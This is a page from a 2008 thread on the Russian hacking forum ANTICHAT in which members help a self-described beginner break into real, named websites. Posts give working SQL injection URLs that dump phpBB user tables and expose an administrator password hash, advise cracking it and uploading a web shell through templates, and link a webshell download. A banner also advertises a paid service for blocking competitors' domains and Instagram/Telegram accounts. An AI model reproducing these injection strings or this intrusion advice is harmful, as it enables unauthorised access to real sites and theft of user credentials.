УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 304 из 1393

304

Опции темы

Поиск в этой теме

Опции просмотра

#3031

22.08.2008, 02:56

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Отправить сообщение для ILYAtirtir с помощью ICQ

никак,просто права на диру не правильно стоят

#3032

22.08.2008, 03:18

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

Отправить сообщение для geforce с помощью ICQ

Есть такой сайт http://www.modvlad.ru/

зделал такое http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users+limit+0.1/*

но это только дял форума! как посмотреть всё что есть в базе? И моно залить туду шелл? И если моно то как?

#3033

22.08.2008, 03:40

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

geforce
вот так смотри все таблы..

Цитата:

http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables/*

вот правельная база от форума..

Цитата:

http://www.modvlad.ru/photo/?g=-1+union+select+111,222,333,444,concat_ws(0x3a,user name,user_password),666+from+phpbb3_users+where+us er_id=2/*

Administrator:$H$9uIjBNujsrtCkk2HuMQPADk9w.i4Mr/
осталось разшифровать.. и залить шелл через темплейты)

#3034

22.08.2008, 05:53

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

А вот деся как мне залить shell???

http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+4,1/*

Последний раз редактировалось geforce; 22.08.2008 в 06:31..

#3035

22.08.2008, 06:25

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

geforce
если есть пасс от админки то разшифруй... и войди в место входа)) а потом уже смотри Залить или не Залить )

Последний раз редактировалось sabe; 22.08.2008 в 07:25..

#3036

22.08.2008, 06:32

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

Что значи (по енг то shellcode) я новичёк вобщето? (=

#3037

22.08.2008, 09:13

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

Провел на форуме:
305110

Репутация: 133

Отправить сообщение для MaSTeR GэN с помощью ICQ

wow.alania.net
ну собсветнно для данного ресурса file_priv Нема то есть через скулю шелл не залить что не удивительно если пасс к админке лежит в базе попробуй его выташить и залить через админку )
Шелл-код (код оболочки, англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе.

При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданый порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (англ. port binding shellcode). Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode).
взято из вики

#3038

22.08.2008, 16:03

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

Цитата:

Сообщение от geforce

Что значи (по енг то shellcode) я новичёк вобщето? (=

если тебе для web уязвимости, то нужен webshell
хороший от маднета http://madnet.name/files/1/10.html

#3039

22.08.2008, 16:24

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

Люди где моно найти ифу про cms nextweb и её уязвимости ,,??

#3040

22.08.2008, 16:29

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

ttp://www.securitylab.ru/vulnerability/205726.php

Страница 304 из 1393

304

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход